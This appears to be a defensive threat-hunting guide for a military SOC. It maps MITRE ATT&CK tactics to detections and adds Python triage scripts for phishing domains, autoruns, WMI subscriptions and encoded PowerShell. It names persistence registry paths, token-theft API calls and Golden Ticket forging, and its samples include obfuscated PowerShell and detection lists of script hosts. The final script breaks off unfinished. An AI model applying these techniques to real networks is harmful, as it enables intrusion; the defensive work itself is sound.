MITRE ATT&CK Framework
Excerpt from "Hunt Methodology" By Christian B.
Introduction
Now that we have done all of the necessary preparation, it is time to start hunting on the network. The MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) Framework gives analysts a good idea of where to start. MITRE developed it as a model to document and track the techniques attackers use throughout the stages of a cyber-attack to infiltrate networks and exfiltrate data. The SOC lead can use the tactics identified in the ATT&CK Framework to help identify and classify potentially anomalous traffic.
Each of these tactics could take an entire book to properly cover, so in this document, we will try to focus on the typical avenues of approach. A link to the MITRE page will be provided for each tactic in the event that more information is needed.
Initial Access
Initial Access consists of techniques that use various entry vectors to gain an initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, such as valid accounts and use of external remote services, or may be of limited use because passwords change. Since typical tactical networks in the military do not include public-facing web servers, it is more likely that some form of phishing will be used to gain initial access to the network.
Detecting Phishing Attempts
Common signs of a possible phishing attempt include emails from non-DoD sources, unsigned emails, misspelt or atypical domain names, poorly written emails, and suspicious links or attachments. All of these can be seen in your sensor logs provided the emails traverse the sensor unencrypted. If the emails are encrypted, you will see nothing at the mail layer; the first visible sign will be the follow-on activity if a user falls for the attempt.
URL inspection within an email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers (sandboxes) can either visit the links automatically to determine whether they are malicious, or wait and capture the content if a user visits the link.
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once User Execution occurs.
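One way to turn the "misspelt or atypical domain names" sign into a check that runs over mail headers, written as an added example for this guide (it is not code from the original text or from any product the guide mentions). The trusted domain list, the homoglyph pairs and the sample From: headers are assumptions constructed for the demo; in practice the trusted list comes from the unit's own mail baseline.

```python
"""Flag sender domains that are not on the trusted list or look like one of them.

Added example for this hunt guide, not part of the original text. The trusted
domain list, the confusable pairs and the sample From: headers are assumptions
constructed for the demo.
"""
import re

# Assumed: domains the unit legitimately receives mail from.
TRUSTED_DOMAINS = {"mail.mil", "usmc.mil", "navy.mil"}

# Character sequences that render alike in many fonts (homoglyphs).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("cl", "d")]

# Constructed sample From: header values (not real traffic).
SAMPLE_FROM_HEADERS = [
    "John Smith <john.smith@usmc.mil>",
    "Pay Office <pay@usmc-mil.com>",
    "Help Desk <it@usrnc.mil>",
    "Vendor <sales@example.com>",
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(header: str) -> str:
    """Pull the domain part out of a From: header; empty string if absent."""
    m = re.search(r"@([A-Za-z0-9.-]+)", header)
    return m.group(1).lower() if m else ""


def fold_confusables(domain: str) -> str:
    """Replace homoglyph sequences so 'usrnc.mil' folds to 'usmc.mil'."""
    for src, dst in CONFUSABLES:
        domain = domain.replace(src, dst)
    return domain


def classify_sender(header: str) -> str:
    """Return 'trusted', 'lookalike', 'external' or 'unknown' for a From: header."""
    domain = sender_domain(header)
    if not domain:
        return "unknown"
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    # Compare both the full domain and the domain without its TLD, after folding
    # homoglyphs, so 'usmc-mil.com' (TLD swapped, dot replaced) is still caught.
    candidates = {fold_confusables(domain), fold_confusables(domain.rsplit(".", 1)[0])}
    for trusted in TRUSTED_DOMAINS:
        if any(levenshtein(c, trusted) <= 1 for c in candidates):
            return "lookalike"
    return "external"


def triage(headers):
    """Map each header to its classification; lookalikes are the ones to chase first."""
    return {h: classify_sender(h) for h in headers}


if __name__ == "__main__":
    for header, verdict in triage(SAMPLE_FROM_HEADERS).items():
        print(f"{verdict:10} {header}")
```

The edit-distance threshold is deliberately tight (1) because short domains such as army.mil and navy.mil are only two edits apart; loosening it trades false positives for recall, so tune it against your own trusted list. This only inspects the From: header; a spoofed From: on an unauthenticated message will classify as trusted, so pair it with SPF/DKIM results where the mail gateway exposes them.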
Prevention or Remedial Actions for Phishing Attempts
Prevention of phishing attempts really falls on the education of the users. It is recommended that the blue team sets up a way for phishing attempts to be reported. This can be easily accomplished by setting up a shared mailbox in Outlook that includes the members of the team. It may also help to configure the email client to show URL links in black so they have to be copied and pasted rather than clicked on. Once reported, or in the event a user falls for the attempt, some easy ways to prevent future phishing attempts from the same source are to block the domain name the email is coming from and to run nslookup on the domain name to determine its IP address and block that as well. Blocking can be done on the firewall, by configuring DNS redirectors to resolve the domain to a null (sinkhole) IP, with Access Control Lists (ACL) on networking devices, or on the Host Intrusion Prevention System (HIPS) firewall in ePolicy Orchestrator (ePO). It is important to block both the IP and the domain name so that the adversary cannot simply change one or the other. Be aware that an IP block can have collateral effect if the address belongs to shared hosting or a content delivery network, and that the adversary can move to a new address quickly, so treat IP blocks as short-lived and review them. Restricting web-based content or web content filtering can also be an efficient way to mitigate the risk of phishing attempts.
More Information
For more information regarding Initial Access, refer to:
https://attack.mitre.org/tactics/TA0001/
Execution
Execution covers a very broad spectrum of activity. Things to generally look for are PowerShell scripts being run or unauthorized software being executed on the network. Understand that if you are inheriting an already built network that you have not seen before, it may be easier to monitor for execution and remediate findings as you see them rather than risk breaking functionality by implementing preventative measures mid-exercise.
Prevention and Remedial Actions for Execution
Prevention and remediation of the execution of malicious code are difficult and sometimes not entirely doable on Marine Corps networks. One way to prevent execution is to implement application whitelisting and limit authorized software to Microsoft-signed executables and software necessary for system functionality. This can be done using Group Policy Objects (GPO) or on the ePO server, but it runs the risk of breaking something that system functionality depends on, so it is highly recommended that it be implemented well ahead of exercise execution in order to test appropriately. Another method of prevention is to set the PowerShell execution policy so that scripts run only if signed (AllSigned). Note that the execution policy is a safety feature rather than a security boundary: it governs script files, not commands passed with -Command or -EncodedCommand, and it can be overridden per process (for example with -ExecutionPolicy Bypass), so pair it with script block logging (Event ID 4104) and application control rather than relying on it alone. This method would require setup in advance of exercise or operations execution. Remedial actions could be as simple as blacklisting unauthorized executables or restricting remote code execution to a single workstation on the network to prevent adversaries from executing code remotely on any workstation.
More Information
For more information regarding Execution, refer to:
https://attack.mitre.org/tactics/TA0002/
Persistence
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.
Methods of Persistence and How to Detect It
Persistence can be implemented in a variety of ways. Some of the more popular methods of initiating persistence include modifying or spoofing services, scheduled tasks, or altering run keys in the registry.
Using Services to Achieve Persistence
When using services to achieve persistence, adversaries may create or modify Windows services to repeatedly execute malicious payloads. When Windows boots, it starts programs called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. An adversary may also incorporate Masquerading by using a service name from a related operating system component or benign software, or by modifying existing services to make detection analysis more challenging. Some easy ways to detect this method are to look at Windows event logs in your sensor dashboards. Security Event ID 4697 indicates that a service was installed on a system (System log Event ID 7045 from the Service Control Manager records the same thing), and Sysmon Event ID 1 is generated when a process is created, so the two can be correlated to see what the new service actually launched.
Scheduling Tasks to Achieve Persistence
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems have mechanisms for automatically running a program on system boot or account login. These include executing programs placed in specially designated directories or referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the referenced program to be executed when a user logs in, under the context of that user and with the account's permission level. Windows operating systems also provide a utility (schtasks.exe) that enables system administrators to execute a program or script at a given date and time. This behavior has been heavily abused by threat actors and red teams as a persistence mechanism. Administrator privileges are not required to create a scheduled task, but if elevated privileges have been achieved further options become available, such as running a task at a user's logon, on idle, or as SYSTEM.

Monitor process execution from svchost.exe on Windows 10 and from the Windows Task Scheduler process taskeng.exe on older versions of Windows. Also monitor the Task Scheduler store in %systemroot%\System32\Tasks for new or changed task files that do not correlate with known software, patch cycles, etc. There are also several Windows Security event IDs that can be used to check scheduled tasks (they require the Audit Other Object Access Events subcategory to be enabled):
-4698 (a scheduled task was created)
-4699 (a scheduled task was deleted)
-4700 (a scheduled task was enabled)
-4701 (a scheduled task was disabled)
-4702 (a scheduled task was updated)
Altering Registry Keys to Achieve Persistence
Registry keys can be added from the command line (for example with reg add) to the run keys to achieve persistence. These keys contain a reference to the payload that will be executed when a user logs in. The following registry locations are known to be used by threat actors:
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Entries under HKEY_CURRENT_USER can be written by an unprivileged user; the HKEY_LOCAL_MACHINE keys require administrator rights.
Sysmon event IDs related to this method of persistence include Event ID 12 (registry object created or deleted), Event ID 13 (registry value set), and Event ID 14 (registry key and value renamed). Sysmon only records the keys its configuration includes, so make sure the run keys are covered by the configuration's registry rules.
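The three persistence methods above (service installs, scheduled tasks, run keys) all reduce to "something new will run at boot or logon, from where, and with what command line", so they can be triaged with one piece of logic. The following is an added example for this guide, not code from the original text: it runs over constructed event records shaped like the fields a collector extracts from Event IDs 7045/4697, 4698 and Sysmon 13, and flags autoruns that point into user-writable directories, launch through a script host or proxy binary, or carry an encoded command. The directory list, the script-host list and the known-good set are assumptions that would be tuned to the real baseline.

```python
"""Triage autorun-style persistence events: service installs (7045/4697),
scheduled task creation (4698) and run-key writes (Sysmon 13).

Added example, not from the original guide. The event dictionaries are
constructed to resemble the parsed fields those events carry (field names
normalised by an assumed collector); the user-writable directory list,
script-host list and known-good set are assumptions for the demo.
"""
import re
from typing import Optional, Tuple

RUN_KEYS = (
    r"\software\microsoft\windows\currentversion\run",   # also matches RunOnce
)
# Directories an unprivileged user can write to; an autorun here deserves a look.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
# Script hosts and proxy binaries often used to launch a payload indirectly.
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "rundll32", "regsvr32", "wscript", "cscript", "certutil")
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)

# Assumed baseline of autoruns already reviewed and accepted (lower-cased).
KNOWN_GOOD = {r"c:\users\jdoe\appdata\local\microsoft\onedrive\onedrive.exe /background"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 7045, "ServiceName": "WinUpdateSvc", "ImagePath": r"C:\Users\jdoe\AppData\Roaming\svchost.exe"},
    {"id": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Command": r"%windir%\system32\defrag.exe", "Arguments": "-c -h"},
    {"id": 4698, "TaskName": r"\Updater", "Command": "powershell.exe",
     "Arguments": "-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"id": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r"wscript.exe C:\Users\jdoe\AppData\Local\Temp\up.vbs"},
]


def autorun_command(event: dict) -> Optional[Tuple[str, str]]:
    """Return (label, command line) for the persistence events we care about."""
    if event["id"] in (7045, 4697):
        return "service " + event["ServiceName"], event["ImagePath"]
    if event["id"] == 4698:
        return "task " + event["TaskName"], (event["Command"] + " " + event.get("Arguments", "")).strip()
    if event["id"] == 13 and any(k in event["TargetObject"].lower() for k in RUN_KEYS):
        return "runkey " + event["TargetObject"].rsplit("\\", 1)[-1], event["Details"]
    return None


def reasons_for(command: str) -> list:
    """Why an autorun command line looks suspicious; empty list means nothing stood out."""
    cmd = command.lower()
    reasons = []
    if any(d in cmd for d in USER_WRITABLE):
        reasons.append("user-writable path")
    if any(b in cmd for b in LOLBINS):
        reasons.append("script host / proxy binary")
    if ENCODED.search(command):
        reasons.append("encoded command")
    return reasons


def triage(events, known_good=KNOWN_GOOD):
    """List (label, reasons) for autoruns that are not baselined and trip a heuristic."""
    findings = []
    for ev in events:
        hit = autorun_command(ev)
        if hit is None:
            continue
        label, command = hit
        if command.lower() in known_good:
            continue
        reasons = reasons_for(command)
        if reasons:
            findings.append((label, reasons))
    return findings


if __name__ == "__main__":
    for label, reasons in triage(SAMPLE_EVENTS):
        print(f"{label}: {', '.join(reasons)}")
```

The OneDrive run key in the sample lives under AppData, which is exactly where legitimate per-user software installs itself; without the known-good set it would be reported alongside the wscript entry. That is the baselining the text keeps returning to: the heuristics find candidates, the baseline keeps the queue short.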
Windows Management Instrumentation (WMI) Persistence
Windows Management Instrumentation (WMI) is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems. WMI provides users with information about the status of local or remote computer systems.
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, a user logging on, or the computer's uptime. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
This can be detected by monitoring WMI event subscription entries and comparing current WMI event subscriptions to known-good subscriptions for each host. Tools such as Sysinternals Autoruns can also detect WMI changes that could be attempts at persistence.
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent PowerShell cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
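The "compare current subscriptions to known good" step above, carried out over Sysmon's WMI events, as an added example for this guide (not code from the original text, and not Sysmon's own output format beyond the field names). It joins Event ID 21 bindings back to their Event ID 19 filter and Event ID 20 consumer, then reports bindings that are off-baseline, that use a consumer class which runs arbitrary code, or that trigger on the uptime/clock/logon conditions the text mentions. The baseline binding is an assumption modelled on the SCM Event Log filter/consumer pair Windows ships with; the events are constructed. The same join applies to the Sysmon 19/20/21 events mentioned under Lateral Movement below, since those events describe subscriptions rather than remote execution.

```python
"""Rebuild WMI event-subscription bindings from Sysmon events 19 (filter),
20 (consumer) and 21 (filter-to-consumer binding) and flag the ones that are
not in the host's known-good baseline or execute commands/scripts.

Added example, not from the original guide. The events are constructed to
look like Sysmon's fields; the baseline binding is an assumption (it is
modelled on the SCM Event Log filter/consumer pair that Windows ships with).
"""
import re

# Consumer classes that run arbitrary code when their filter fires.
CODE_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Triggers the text calls out: uptime, wall-clock time, user logon, plus
# the generic instance-modification polling that most implants use.
TRIGGER_RE = re.compile(r"uptime|win32_localtime|win32_logonsession|__instancemodificationevent", re.I)

# Assumed known-good bindings for this host: (filter name, consumer name).
BASELINE = {("SCM Event Log Filter", "SCM Event Log Consumer")}

# Constructed sample events (not real Sysmon output).
SAMPLE_EVENTS = [
    {"id": 19, "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"id": 20, "Name": "SCM Event Log Consumer", "Type": "NTEventLogEventConsumer", "Destination": ""},
    {"id": 21, "Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
    {"id": 19, "Name": "Updater",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"id": 20, "Name": "Updater", "Type": "CommandLineEventConsumer",
     "Destination": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 21, "Filter": "Updater", "Consumer": "Updater"},
    {"id": 19, "Name": "Orphan", "Query": "SELECT * FROM Win32_LogonSession"},
]


def build_bindings(events):
    """Join bindings to their filter query and consumer definition by name."""
    filters = {e["Name"]: e["Query"] for e in events if e["id"] == 19}
    consumers = {e["Name"]: e for e in events if e["id"] == 20}
    joined = []
    for e in events:
        if e["id"] == 21:
            joined.append((e["Filter"], e["Consumer"],
                           filters.get(e["Filter"], ""), consumers.get(e["Consumer"], {})))
    return joined


def unbound_filters(events):
    """Filters with no binding: inert on their own, but often a half-installed implant."""
    bound = {e["Filter"] for e in events if e["id"] == 21}
    return sorted(e["Name"] for e in events if e["id"] == 19 and e["Name"] not in bound)


def find_suspicious_bindings(events, baseline=BASELINE):
    """Return one finding per binding that is off-baseline, with the reasons."""
    findings = []
    for flt, con, query, consumer in build_bindings(events):
        if (flt, con) in baseline:
            continue
        ctype = consumer.get("Type", "unknown")
        reasons = []
        if ctype in CODE_CONSUMERS:
            reasons.append(f"{ctype} executes arbitrary code")
        if TRIGGER_RE.search(query):
            reasons.append("trigger on uptime/clock/logon or instance modification")
        if not reasons:
            reasons.append("binding not in baseline")
        findings.append({"filter": flt, "consumer": con, "type": ctype,
                         "command": consumer.get("Destination", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_bindings(SAMPLE_EVENTS):
        print(f"{f['filter']} -> {f['consumer']} ({f['type']}): {'; '.join(f['reasons'])}")
    print("unbound filters:", unbound_filters(SAMPLE_EVENTS))
```

A binding is what makes a subscription fire, so it is the unit to baseline; an unbound filter or consumer by itself does nothing, but it is worth listing because an implant that was interrupted, or one that registers the pieces at different times, shows up that way first.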
Prevention and Remediation of Persistence Findings
Without proper account management, limits on credential overlap across systems, or application whitelisting, Persistence is another tactic that might be easier to mitigate as you find it rather than risk breaking something by applying preventative measures mid-exercise. Ensure that unauthorized applications are not configured to auto-start or run at logon. If they are, those applications can be blocked via GPO or on the ePO server; remove the autorun entry itself (service, task, run key or WMI subscription) as well as the binary, otherwise the entry keeps trying to run at every boot.
More Information
For more information regarding Persistence, refer to:
https://attack.mitre.org/tactics/TA0003/
https://www.tripwire.com/state-of-security/mitre-framework/the-mitre-attck-framework-persistence/
https://www.ultimatewindowssecurity.com/webinars/register.aspx?id=2563
https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-add
https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
Privilege Escalation
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
-SYSTEM/root level
-Local administrator
-User account with admin-like access
-User accounts with access to a specific system or perform a specific function.
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.
Methods of Achieving Privilege Escalation and How to Detect Them
There are several methods of achieving privilege escalation. Some of the more common methods are Token Manipulation, Autostart Execution, Process Injection, and Scheduled Tasks.
Token Manipulation
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the security context of a running process or thread. An adversary can manipulate access tokens so that a running process appears to be the child of a different process or to belong to someone other than the user who started it. When this occurs, the process or thread takes on the security context associated with the new token.
The following Application Programming Interface (API) calls can be used to steal and abuse access tokens:
-OpenProcess() - takes a process identifier (PID) and returns a process handle. The handle must be opened with the PROCESS_QUERY_INFORMATION, PROCESS_QUERY_LIMITED_INFORMATION or PROCESS_ALL_ACCESS access right to be usable with OpenProcessToken()
-OpenProcessToken() - takes a process handle and an access rights flag and opens a handle to the access token associated with the process. The token handle must be opened with the TOKEN_QUERY and TOKEN_DUPLICATE access rights to be usable with ImpersonateLoggedOnUser() and DuplicateTokenEx()
-ImpersonateLoggedOnUser() - lets the calling thread impersonate the security context of the logged-on user the token represents
-DuplicateTokenEx() - creates a new token that duplicates an existing one, for example turning an impersonation token into a primary token that can be used to create a process
-CreateProcessWithTokenW() - creates a new process that runs in the security context of the supplied primary token (the caller needs SeImpersonatePrivilege)
-SetThreadToken() - assigns an impersonation token to a thread
Windows Security event IDs that can help identify modified tokens include 4672 (special privileges assigned to new logon), 4703 (a token right was adjusted), 4673 (a privileged service was called), and 4674 (an operation was attempted on a privileged object). Look in particular for 4673/4674 entries that reference privileges such as SeDebugPrivilege or SeImpersonatePrivilege from processes that do not normally need them.
Autostart Execution Techniques
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account login. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
Winlogon Helper Dynamic-Link Library (DLL)
Adversaries may abuse features of Winlogon to execute Dynamic-Link Libraries (DLL) and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon; the Userinit and Shell values and the Notify subkey are the usual targets.
Registry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or placing a program in a startup folder will cause that program to be executed when a user logs in, under the context of that user and with the account's permission level. There is a startup folder for individual user accounts as well as a system-wide startup folder that is checked regardless of which user logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
Authentication Package
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
Time Providers
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. Time providers are implemented as dynamic-link libraries (DLLs) that are registered in subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. The time provider manager, directed by the service control manager, loads and starts the time providers listed and enabled under this key at system startup and whenever parameters are changed. Adversaries may abuse this architecture to establish persistence by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in the context of the Local Service account.
Re-Opened Applications
Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after a reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, the same information is held in property list (plist) files located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist. An adversary can modify one of these files directly to include a reference to their malicious executable, giving them persistence each time the user reboots their machine.
Process Injection
Process Injection is a method of executing arbitrary code in the address space of another live process in order to gain privilege escalation and evade process-based defenses. The methods listed below are different ways to inject code into a process, many of which abuse legitimate functionality. Injection techniques exist for every major OS but are typically platform specific.
There are several ways privilege escalation can be achieved using process injection. Those methods include but are not limited to:
-DLL Injection
-Portable Executable Injection
-Thread Execution Hijacking
-Asynchronous Procedure Call
-Thread Local Storage
-PTrace System Calls
-Proc Memory
-Extra Window Memory Injection
-Process Hollowing
-Process Doppelganging
-Virtual Dynamic Shared Object (vDSO) Hijacking
Because entire books can be written about these methods, it is recommended that those interested in more detail do their research. These methods are all annotated on the DCO Wiki page located on the DCO portion of the Tactical Information Environment (TIE) network. The URL for that wiki is http://team3.dco
Scheduled Tasks
Task Scheduler is a set of Microsoft Windows components that allows for the execution of scheduled tasks. The front-end components of Task Scheduler, such as schtasks.exe, are interfaces that allow users to view, create, and modify scheduled tasks. The back-end part of Task Scheduler is a Windows service that runs with SYSTEM privileges. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
Privilege escalation through scheduled tasks can be detected by monitoring process execution from svchost.exe on Windows 10 and from the Windows Task Scheduler process taskeng.exe on older versions. Also monitor the Task Scheduler store in %systemroot%\System32\Tasks for task files that do not correlate with known software, patch cycles, etc. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell (Register-ScheduledTask), so do not rely on schtasks.exe command lines alone.
Other Exploits
Once access is gained to an account with domain administrator privileges, an attacker can log into a Domain Controller (DC) and use a tool like Mimikatz to dump the password hash for the KRBTGT account and forge a Golden Ticket (a Kerberos TGT signed with that hash). Using Mimikatz, the forged ticket can then be injected into any session for any user and used to access anything on the domain. Because the DC trusts any TGT it can decrypt with the KRBTGT key, the ticket stays valid until the KRBTGT password is changed, regardless of the user's own password.

Prevention or Remedial Actions for Instances of Privilege Escalation
There are several ways to escalate privileges and several ways to prevent it. The easiest first step is to enforce strong passwords so that accounts cannot be brute-forced. It is difficult to stop users from choosing keyboard walks and simple passwords, so where possible use two-factor authentication. Configure specialized users and groups with minimum privileges and remove user accounts when they are no longer needed. Close unused ports and limit file access to users and groups with a need-to-know. Change default credentials on all devices, and deploy the Local Administrator Password Solution (LAPS) so that every domain-joined host has a unique, regularly rotated local administrator password; a shared local admin password lets one compromised host unlock all the others.
In the event that an adversary acquires a Golden Ticket, you will need to reset all domain and local passwords. The KRBTGT account password must be changed twice, because the DC keeps the previous password to validate existing tickets. Allow replication to complete between the two resets, and ideally wait at least the maximum TGT lifetime (10 hours by default) so that legitimate tickets issued under the old key expire gracefully rather than all failing at once; it is the second key change, not a DC restart, that invalidates the forged ticket.
More Information
For more information regarding Privilege Escalation, refer to:
https://attack.mitre.org/tactics/TA0004/
https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/
Defense Evasion
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
Detecting Defense Evasion
Detecting defense evasion is actually fairly straightforward provided you have sensors in place and are receiving host logs. You will find obfuscated PowerShell scripts being used across the network, and logs are generated when security software is uninstalled or disabled. It is important to know which PowerShell scripts your LNOs and your own team use, so that potentially malicious scripts stand out. Enable PowerShell script block logging (Event ID 4104), which records script blocks as they are executed, including those produced by decoding an encoded command or by Invoke-Expression, so an encoded command line no longer hides the payload.
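The obfuscated and encoded PowerShell this section and the Execution section describe can be scored from process-creation or script-block telemetry. The following is an added example for this guide, not code from the original text or from any tool the guide names: it weights the indicators an analyst looks for (encoded command, hidden window, download cradle, backtick and string-concatenation obfuscation) and, when a -EncodedCommand blob is present, decodes it the way PowerShell would (base64 of UTF-16LE) so the payload is scored too. The indicator list and weights are assumptions; the sample command lines are constructed, and the encoded one is built inside the block from a plain-text cradle so the decode path runs offline.

```python
"""Score PowerShell command lines (from 4688 / Sysmon 1 / 4104 telemetry) for
encoding and obfuscation, decoding -EncodedCommand so the payload is scored too.

Added example that serves the Execution and Defense Evasion sections; it is
not from the original guide. The indicator list and weights are assumptions,
and the sample command lines are constructed (the encoded one is built here
from a plain-text cradle so the decode path can be exercised offline).
"""
import base64
import re

# (regex, indicator name, weight). Weights are an assumed starting point.
INDICATORS = [
    (r"-(ep|executionpolicy)\s+bypass", "execution policy bypass", 1),
    (r"-(nop|noprofile)\b", "-NoProfile", 1),
    (r"-(noni|noninteractive)\b", "-NonInteractive", 1),
    (r"-w(indowstyle)?\s+hidden", "hidden window", 2),
    (r"\b(iex|invoke-expression)\b", "Invoke-Expression", 2),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", "download cradle", 3),
    (r"frombase64string", "inline base64 decode", 2),
    (r"`[a-z]", "backtick insertion", 2),
    (r"\[char\]\s*\d+|-join\s*\(", "char-code assembly", 2),
    (r"""\(\s*['"][^'"]+['"]\s*\+\s*['"]""", "string concatenation", 1),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 4


def build_encoded(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded(cmdline: str):
    """Decode the -EncodedCommand blob if present and well-formed, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmdline: str):
    """Return (total score, indicator names, decoded payload or None)."""
    hits, total = [], 0
    decoded = decode_encoded(cmdline)
    if ENC_RE.search(cmdline):
        hits.append("encoded command")
        total += 3
    # Scan the command line with the blob masked (so base64 noise cannot match
    # an indicator by accident), plus the decoded payload when there is one.
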